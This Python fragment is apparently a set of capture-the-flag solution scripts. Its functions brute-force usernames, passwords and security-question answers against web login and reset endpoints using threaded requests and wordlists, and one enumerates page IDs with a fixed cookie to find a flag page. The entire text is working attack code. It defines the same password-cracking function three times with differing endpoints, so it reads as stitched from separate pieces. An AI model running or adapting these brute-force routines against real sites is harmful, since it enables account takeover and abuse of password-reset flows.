def crack_username(ip, instance_id):
"""
Enumerates common usernames and returns the valid ones after trying.
:param ip:
:param instance_id:
:return:
"""
path = "/".join((instance_id, ENDPOINT))
req_template = HttpRequest(ip, method=HttpMethod.POST, path=path, headers=HEADERS)
regex = r">Invalid username<"
return h.parallel_attack(
req_template,
generate_uname_req,
f(regex, True),
data_file="uname_list.txt",
threads=20,
)
def crack_password(ip, instance_id, username):
"""
Enumerates common passwords and returns the valid ones after trying. A valid username is required.
:param ip:
:param instance_id:
:param username:
:return:
"""
path = "/".join((instance_id, ENDPOINT_LOGIN))
req_template = HttpRequest(ip, method=HttpMethod.POST, path=path, headers=HEADERS)
regex = r"Combination is invalid"
passwd_req_gen = get_passwd_func(username)
return h.parallel_attack(
req_template,
passwd_req_gen,
f(regex, True),
data_file="uname_list.txt",
threads=10,
)
def crack_security_question(ip, instance_id, user_hash):
"""
Enumerates common answers to a security question and returns the valid ones after trying. A valid user hash is
required.
:param ip:
:param instance_id:
:param user_hash:
:return:
"""
path = "/".join((instance_id, ENDPOINT_RESET))
req_template = HttpRequest(ip, method=HttpMethod.POST, path=path, headers=HEADERS)
regex = r"Invalid answer"
reset_req_gen = get_reset_func(user_hash)
return h.parallel_attack(
req_template,
reset_req_gen,
f(regex, True),
data_file="uname_list.txt",
threads=10,
)
def crack_password(ip, instance_id, username):
"""
Enumerates common passwords and returns the valid ones after trying. A valid username is required.
:param ip:
:param instance_id:
:param username:
:return:
"""
path = "/".join((instance_id, ENDPOINT))
req_template = HttpRequest(ip, method=HttpMethod.POST, path=path, headers=HEADERS)
regex = r">Invalid password<"
passwd_req_gen = get_passwd_func(username)
# Use the same common word list like username.
# A real password list is probably more suited for cracking a real application.
return h.parallel_attack(
req_template,
passwd_req_gen,
f(regex, True),
data_file="uname_list.txt",
threads=20,
)
def search_secret_page(ip, instance_id, max_page_num):
"""
Iterates and seeks for the secret page with a flag, returns the page ID if found.
:param ip:
:param instance_id:
:param max_page_num:
:return:
"""
if max_page_num < 1:
max_page_num = 10
sequence = list(range(0, max_page_num + 1))
path = "/".join((instance_id, ENDPOINT))
cookies = {"id": "c81e728d9d4c2f636f067f89cc14862c"}
req_template = HttpRequest(ip,
method=HttpMethod.GET,
path=path,
cookies=cookies)
regex = r"\^FLAG\^"
return h.parallel_attack(req_template,
generate_page_req,
f(regex, False),
sequence=sequence,
threads=5)
def crack_password(ip, instance_id, username):
"""
Enumerates common passwords and returns the valid ones after trying. A valid username is required.
:param ip:
:param instance_id:
:param username:
:return:
"""
path = "/".join((instance_id, ENDPOINT))
query_params = {"page": "sign_in.php"}
req_template = HttpRequest(ip,
method=HttpMethod.POST,
path=path,
headers=HEADERS,
params=query_params)
regex = r"wrong username"
passwd_req_gen = get_passwd_func(username)
return h.parallel_attack(
req_template,
passwd_req_gen,
f(regex, True),
data_file="uname_list.txt",
threads=10,
)